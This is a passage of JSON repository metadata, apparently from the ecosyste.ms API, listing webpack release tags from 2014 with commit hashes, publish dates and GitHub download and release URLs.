-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-r